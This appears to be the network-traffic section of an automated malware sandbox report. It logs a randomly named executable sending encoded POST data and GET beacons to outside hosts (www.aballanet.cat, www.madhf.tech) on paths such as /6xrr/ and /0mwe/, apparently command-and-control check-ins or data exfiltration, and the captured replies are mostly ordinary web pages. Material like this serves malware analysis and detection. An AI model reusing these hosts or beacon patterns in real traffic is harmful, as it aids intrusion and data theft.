Jan 11, 2025 01:40:11.995928049 CET	500	IN	Data Raw: 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 Data Ascii: ports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).t
Jan 11, 2025 01:40:11.995954037 CET	1236	IN	Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
Jan 11, 2025 01:40:11.996020079 CET	1236	IN	Data Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
Jan 11, 2025 01:40:11.996033907 CET	448	IN	Data Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
Jan 11, 2025 01:40:11.996048927 CET	1236	IN	Data Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10
Jan 11, 2025 01:40:12.001015902 CET	1236	IN	Data Raw: 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 Data Ascii: 02,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49972	134.0.14.158	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:13.679163933 CET	1672	OUT	POST /6xrr/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1243 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.aballanet.cat Origin: http://www.aballanet.cat Referer: http://www.aballanet.cat/6xrr/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 36 46 55 42 79 6d 59 43 31 73 39 51 56 63 62 70 33 50 31 4d 32 58 4c 77 33 39 7a 61 4f 32 78 35 61 4c 37 63 63 6d 48 62 47 6d 53 62 43 6b 6e 76 4b 57 49 66 39 36 2b 36 55 57 34 77 41 5a 63 74 48 4c 56 46 63 73 47 65 57 62 36 72 38 52 6f 58 6a 4a 5a 67 39 34 48 74 33 4b 4b 64 2f 32 78 37 39 66 51 2f 56 70 70 39 42 6a 6c 43 57 76 71 2f 6a 59 2f 73 36 76 77 6d 4b 5a 52 2f 36 54 55 52 6a 45 33 5a 4a 6b 36 4c 50 6b 52 6e 7a 74 2f 43 6d 59 6c 45 34 52 75 6d 51 48 65 72 44 53 50 75 74 48 76 4e 4a 57 37 48 44 7a 49 4b 2f 52 78 35 5a 79 33 4c 79 75 7a 66 35 6a 6b 75 4d 55 76 71 32 59 2b 43 6e 6a 6d 6d 50 75 70 67 33 69 45 38 68 53 52 4d 75 35 6c 59 34 52 6b 6b 62 38 61 31 4b 47 4b 46 6c 41 34 46 4e 66 54 79 6f 6d 63 67 61 30 31 6e 69 35 65 75 34 46 30 48 30 61 37 32 30 4e 4f 63 71 74 34 61 2b 4f 4e 49 76 4d 4b 33 36 53 4a 65 34 53 51 68 52 45 33 6e 6f 45 4b 76 78 43 48 30 78 69 53 74 53 52 6a 50 52 51 37 47 55 35 74 64 55 66 50 5a 6a 35 2b 52 75 62 78 [TRUNCATED] Data Ascii: KBEhCJ=KzhgXQhB/IGl6FUBymYC1s9QVcbp3P1M2XLw39zaO2x5aL7ccmHbGmSbCknvKWIf96+6UW4wAZctHLVFcsGeWb6r8RoXjJZg94Ht3KKd/2x79fQ/Vpp9BjlCWvq/jY/s6vwmKZR/6TURjE3ZJk6LPkRnzt/CmYlE4RumQHerDSPutHvNJW7HDzIK/Rx5Zy3Lyuzf5jkuMUvq2Y+CnjmmPupg3iE8hSRMu5lY4Rkkb8a1KGKFlA4FNfTyomcga01ni5eu4F0H0a720NOcqt4a+ONIvMK36SJe4SQhRE3noEKvxCH0xiStSRjPRQ7GU5tdUfPZj5+Rubxt5LPXSdezx+fe6h6KO82rWi8xK2hPhQUrhfCZI7Tpw9b3kyCBFjcGVVsHyMizva9uYgh1MIVYl0RHo4CPWl4goDYbh4HPcvNOiuDBXt1FtRK/ligONTT3+qenhL0R7sNl8aEvMTqKuwK4cKpwHHAqpk1uJYZVsyRSuxwIUACK4C4mRg5yxFISplP3LXFb1K0hpk3DoYLGxDdGhBse5ukTqEAMgr4kZvdbnTVDfXSN27zvaDQTLCUev227Y/+NpDAlQSlzPXlzKqJvsXkhzKp36nuiM+gBAD22tpOdrgdyROqwD6HXzYvwjsKODrpROu/YOGh68dTCGWx/dSqlYMCI4VUd5iHbrDrUfgiI8S9tZGTAScwIl6CP8+MasiNL93H7TvkLfg1VKZhVWWSV+lP6/1TiZv0uosQJ7y4wMEU24xDthdgfhCZVIX6+a9rmEJjnUWC5B13sZyaFm9nfhvPDRIjT6HgjOb4nS3qgtHBfbLAWyrtpVf9hZaRs5kggJ64KF8w3R5s2fFBClszODNeKNA1Zbn8kD/HdPeVevR9ki+LLOjKdr29tXxEzSOFh8ngbpkbNOKYcf0VWvoYt6e+s5K2XKZLqoJ74yg0K/xBjqGtYMiKptW6BBaLbUCHHlCvFqw4DQxuJNiBHaM7lkcPu0cRZ/FVfSn6mf [TRUNCATED]
Jan 11, 2025 01:40:14.509183884 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 00:40:14 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED] Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
Jan 11, 2025 01:40:14.509200096 CET	1236	IN	Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
Jan 11, 2025 01:40:14.509213924 CET	448	IN	Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
Jan 11, 2025 01:40:14.509234905 CET	1236	IN	Data Raw: 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 Data Ascii: {e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageDa
Jan 11, 2025 01:40:14.509257078 CET	1236	IN	Data Raw: 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 Data Ascii: peof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=
Jan 11, 2025 01:40:14.509273052 CET	276	IN	Data Raw: 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 Data Ascii: {n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemoji
Jan 11, 2025 01:40:14.509287119 CET	1236	IN	Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
Jan 11, 2025 01:40:14.509300947 CET	1236	IN	Data Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
Jan 11, 2025 01:40:14.509315014 CET	448	IN	Data Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
Jan 11, 2025 01:40:14.509330034 CET	1236	IN	Data Raw: 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 Data Ascii: ient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 10
Jan 11, 2025 01:40:14.514245033 CET	1236	IN	Data Raw: 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 Data Ascii: 02,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49980	134.0.14.158	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:16.224611044 CET	378	OUT	GET /6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.aballanet.cat User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 01:40:17.051168919 CET	506	IN	HTTP/1.1 301 Moved Permanently Date: Sat, 11 Jan 2025 00:40:16 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49981	103.224.182.242	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:22.543145895 CET	626	OUT	POST /0mwe/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 207 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/0mwe/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 46 34 58 73 73 64 63 57 39 64 59 6d 54 58 30 6d 2b 4f 7a 6d 48 6d 71 4d 79 70 4d 30 56 78 49 49 7a 4b 57 71 52 6f 65 2b 48 66 75 39 49 6a 46 68 63 2b 6a 56 6b 4f 69 58 70 79 7a 5a 77 54 31 46 45 39 46 57 45 44 34 32 5a 63 49 61 79 47 68 57 64 6f 74 4a 35 2f 6c 6a 4b 70 50 66 6f 66 43 4d 61 50 4b 69 6b 62 68 52 79 68 64 45 2f 38 78 48 43 7a 74 4b 32 2f 39 39 46 67 64 32 79 6a 48 63 63 4d 4f 39 2b 6b 44 33 69 77 33 77 49 31 64 7a 51 44 4f 6a 62 42 32 4f 32 4c 64 61 63 32 71 32 55 30 41 6b 72 73 34 42 48 6c 47 43 79 58 72 50 52 78 47 46 58 67 39 55 4b 33 58 36 55 63 65 4f 6a 51 6b 59 6a 6f 73 3d Data Ascii: KBEhCJ=F4XssdcW9dYmTX0m+OzmHmqMypM0VxIIzKWqRoe+Hfu9IjFhc+jVkOiXpyzZwT1FE9FWED42ZcIayGhWdotJ5/ljKpPfofCMaPKikbhRyhdE/8xHCztK2/99Fgd2yjHccMO9+kD3iw3wI1dzQDOjbB2O2Ldac2q2U0Akrs4BHlGCyXrPRxGFXg9UK3X6UceOjQkYjos=
Jan 11, 2025 01:40:23.160283089 CET	871	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 00:40:23 GMT server: Apache set-cookie: __tad=1736556023.3953434; expires=Tue, 09-Jan-2035 00:40:23 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED] Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49982	103.224.182.242	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:40:25.088967085 CET	646	OUT	POST /0mwe/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 227 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.madhf.tech Origin: http://www.madhf.tech Referer: http://www.madhf.tech/0mwe/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 4b 42 45 68 43 4a 3d 46 34 58 73 73 64 63 57 39 64 59 6d 56 33 45 6d 74 39 72 6d 57 47 71 50 39 4a 4d 30 4f 68 49 4d 7a 4b 53 71 52 70 72 7a 48 4e 4b 39 49 42 64 68 66 2f 6a 56 6a 4f 69 58 6d 53 7a 51 76 6a 31 4f 45 39 34 72 45 44 30 32 5a 63 4d 61 79 43 78 57 64 37 46 4f 35 76 6c 6c 44 4a 50 5a 32 76 43 4d 61 50 4b 69 6b 62 45 38 79 68 46 45 38 50 35 48 43 58 5a 46 71 76 39 38 43 67 64 32 34 44 47 62 63 4d 4f 36 2b 6c 4f 59 69 79 50 77 49 31 74 7a 51 57 36 67 4d 52 33 6b 79 4c 63 77 59 55 37 5a 4e 58 41 57 6f 4d 39 63 51 44 65 6d 33 68 61 6c 4c 54 4f 74 45 41 52 73 61 6b 66 4e 46 73 2f 6e 35 7a 30 6f 39 2f 37 4e 44 74 58 4b 34 49 76 4b 39 35 72 49 42 69 67 32 30 59 6c 4e Data Ascii: KBEhCJ=F4XssdcW9dYmV3Emt9rmWGqP9JM0OhIMzKSqRprzHNK9IBdhf/jVjOiXmSzQvj1OE94rED02ZcMayCxWd7FO5vllDJPZ2vCMaPKikbE8yhFE8P5HCXZFqv98Cgd24DGbcMO6+lOYiyPwI1tzQW6gMR3kyLcwYU7ZNXAWoM9cQDem3halLTOtEARsakfNFs/n5z0o9/7NDtXK4IvK95rIBig20YlN
Jan 11, 2025 01:40:25.706581116 CET	871	IN	HTTP/1.1 200 OK date: Sat, 11 Jan 2025 00:40:25 GMT server: Apache set-cookie: __tad=1736556025.8120462; expires=Tue, 09-Jan-2035 00:40:25 GMT; Max-Age=315360000 vary: Accept-Encoding content-encoding: gzip content-length: 576 content-type: text/html; charset=UTF-8 connection: close Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 [TRUNCATED] Data Ascii: TMo0=pvJQl;aZ[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[Z*kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS\|lglvE)oNfg9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P\|q8?WnrSH+px2]WZ^>%fWxV\o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49983	103.224.182.242	80	3668	C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Timestamp	Bytes transferred	Direction	Data
